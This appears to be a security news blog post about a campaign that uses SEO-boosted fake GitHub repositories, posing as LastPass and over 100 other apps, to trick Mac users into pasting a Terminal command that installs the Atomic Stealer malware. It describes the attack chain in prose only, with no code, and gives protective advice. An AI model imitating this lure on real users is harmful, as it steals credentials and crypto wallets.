Stay updated with the latest Cybersecurity News on our TecnetBlog.

Fake Password Managers Target Mac Users with Malware

Written by Adrian León | Sep 23, 2025 1:15:00 PM

When looking for a reliable tool to protect your passwords, the last thing you expect is to fall into a trap designed to steal your data. But that’s exactly what’s happening. LastPass has issued a warning about a new campaign targeting macOS users, where cybercriminals impersonate password managers and other popular programs to spread malware.

At TecnetOne, we’ll explain how this threat works, which software is being faked, and what steps you can take to avoid becoming a victim.

 

What’s Happening with Fake Password Managers?

 

Attackers are creating fraudulent GitHub repositories that look official. They host supposed versions of well-known apps, but what they actually deliver is a malware called Atomic Stealer (AMOS).

This malicious tool is part of a Malware-as-a-Service (MaaS) operation, available on underground forums for $1,000/month. Its main goal is to steal sensitive data from infected machines—including login credentials, cookies, browsing history, and even cryptocurrency wallet details.

The campaign uses search engine optimization (SEO) techniques to push these fake repositories to the top of Google or Bing results, increasing the chances of luring victims.

 

Malicious Google Search result (Source: LastPass)

 

How the Attack Works

 

The attack follows a method known as ClickFix, where users are tricked into running a command in macOS Terminal without understanding its consequences.

Here’s how it happens:

 

  1. You search for software like LastPass, 1Password, or Notion on Google.

 

  1. A top result leads you to a legit-looking GitHub repository.

 

  1. The page includes a “Download” button.

 

  1. That button redirects to a separate website with Terminal instructions.

 

  1. You’re told to copy-paste a command into Terminal.

 

That command silently uses curl to download a malicious install.sh file into your /tmp folder. Once executed, AMOS installs itself and starts exfiltrating your data.

 

Read more: NimDoor: Malware for macOS that reinstalls itself after being removed

 

Software and Services Being Imitated

 

The campaign doesn’t stop at LastPass. According to the report, attackers have created fake versions of over 100 applications, including:

 

  1. Password managers like 1Password

 

  1. Cloud and collaboration platforms: Dropbox, Notion, Confluence

 

  1. Financial apps: Robinhood, Fidelity, Gemini

 

  1. Creative tools: Adobe After Effects, Audacity

 

  1. Email clients: Thunderbird

 

  1. Even cybersecurity solutions like SentinelOne

 

Everything appears legitimate—GitHub pages, branding, and installation instructions—all designed to build trust.

 

GitHub repository claiming affiliation with LastPass (Source: LastPass)

 

Why AMOS Is So Dangerous

 

While Atomic Stealer was already known in cybersecurity circles, its developers recently added a persistent backdoor—making it even more dangerous.

Not only does it steal your data, but it also gives attackers ongoing, stealthy access to your Mac. They can install more malware or use your device as a launchpad for broader attacks.

 


Page hosting the ClickFix instructions (Source: LastPass)

 

Similar Campaigns in the Past

 

ClickFix-style attacks on macOS aren't new. Past campaigns used fake ads to promote bogus solutions to system errors or impersonated legitimate brands like Booking.com.

What makes this campaign stand out is its scale and execution: over 100 programs spoofed and a well-executed SEO strategy to reach thousands of users.

 

Learn more: North Korean Hackers Use Deepfakes on Zoom to Infect Macs

 

How to Protect Yourself

 

At TecnetOne, we always stress: prevention is your first line of defense. Here’s what you can do:

 

  1. Download only from official websites. If you're looking for an app, go straight to the vendor’s site. Don’t trust top search results blindly.

 

  1. Never run Terminal commands you don’t fully understand.

 

  1. Verify GitHub repositories. Look for signs of authenticity like verified accounts, contributor history, and follower count.

 

  1. Keep your Mac up to date with the latest macOS and app security patches.

 

  1. Use a reputable security solution. At TecnetOne, we partner with trusted vendors to detect suspicious behavior and data exfiltration.

 

  1. Enable two-factor authentication (2FA). If your credentials are stolen, this second layer could stop an attacker in their tracks.

 

What to Do If You Think You’re Infected

 

If you ever copied a Terminal command from a suspicious GitHub page, here’s what to do:

 

  1. Immediately disconnect your Mac from the internet.

 

  1. Run a malware scan with a trusted security tool.

 

  1. Change all your passwords using another clean device.

 

  1. Monitor your banking and crypto accounts for suspicious activity.

 

  1. Consider a clean reinstall of macOS, especially if a persistent backdoor is suspected.

 

Final Thoughts

 

Cybercriminals are getting more creative and opportunistic. This campaign combines SEO manipulation, fake GitHub repositories, and Terminal-based installation—making it easy to fall for if you're not cautious.

At TecnetOne, we believe the best defense is digital awareness: learn to spot red flags, verify sources, and never run what you don’t understand.

The fake LastPass campaign (and more than 100 other apps) is a clear reminder that even Mac users aren’t immune. The idea that macOS is “safe by default” no longer holds up.

Cybersecurity isn’t about fear—it’s about smart prevention. If you follow best practices, you can enjoy the full power of your Mac without becoming an easy target.

 
View full post